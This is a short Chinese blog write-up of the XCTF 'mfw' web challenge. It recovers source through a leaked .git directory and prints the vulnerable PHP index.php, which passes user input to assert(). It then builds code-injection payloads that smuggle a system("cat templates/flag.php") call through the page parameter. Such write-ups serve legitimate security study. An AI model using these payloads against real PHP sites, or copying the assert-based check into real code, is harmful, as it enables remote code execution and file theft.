2. 技术博客
  3. 【XCTF 攻防世界】WEB 高手进阶区mfw

【XCTF 攻防世界】WEB 高手进阶区mfw

tech2022-10-23  114

进入环境,看到about界面用到的技术git 第一时间可以想到git泄露 使用githack扫描一下 python GitHack,py 网址/.git 可以看到index.php

和templates文件夹,templates文件夹是存放网页模板信息的

都已经显示在网页中 可惜flag.php没有内容

查看index.php 发现有猫腻

<?php if (isset($_GET['page'])) { $page = $_GET['page']; } else { $page = "home"; } $file = "templates/" . $page . ".php"; // I heard '..' is dangerous! assert("strpos('$file', '..') === false") or die("Detected hacking attempt!"); // TODO: Make this look nice assert("file_exists('$file')") or die("That file doesn't exist!"); ?> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>My PHP Website</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/css/bootstrap.min.css" /> </head> <body> <nav class="navbar navbar-inverse navbar-fixed-top"> <div class="container"> <div class="navbar-header"> <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="navbar-brand" href="#">Project name</a> </div> <div id="navbar" class="collapse navbar-collapse"> <ul class="nav navbar-nav"> <li <?php if ($page == "home") { ?>class="active"<?php } ?>><a href="?page=home">Home</a></li> <li <?php if ($page == "about") { ?>class="active"<?php } ?>><a href="?page=about">About</a></li> <li <?php if ($page == "contact") { ?>class="active"<?php } ?>><a href="?page=contact">Contact</a></li> <!--<li <?php if ($page == "flag") { ?>class="active"<?php } ?>><a href="?page=flag">My secrets</a></li> --> </ul> </div> </div> </nav> <div class="container" style="margin-top: 50px"> <?php require_once $file; ?> </div> <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/1.12.4/jquery.min.js" /> <script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/js/bootstrap.min.js" /> </body> </html>

这里将get的page变量进行一部分拼接得到file $file = "templates/" . $page . ".php"; 同时还要绕过下面的语句 assert("strpos('$file', '..') === false") or die("Detected hacking attempt!"); 这里将$ file换成含有$ page的语句,方便查看 assert("strpos("templates/" . $page . ".php", '..') === false") or die("Detected hacking attempt!");

构造payload:

assert("strpos("templates/" . 1234') or system("cat ./templates/flag.php") ;// . ".php", '..') === false") or die("Detected hacking attempt!");

或 1234','567') === false and system("cat templates/flag.php") and strpos('123

最新回复(0)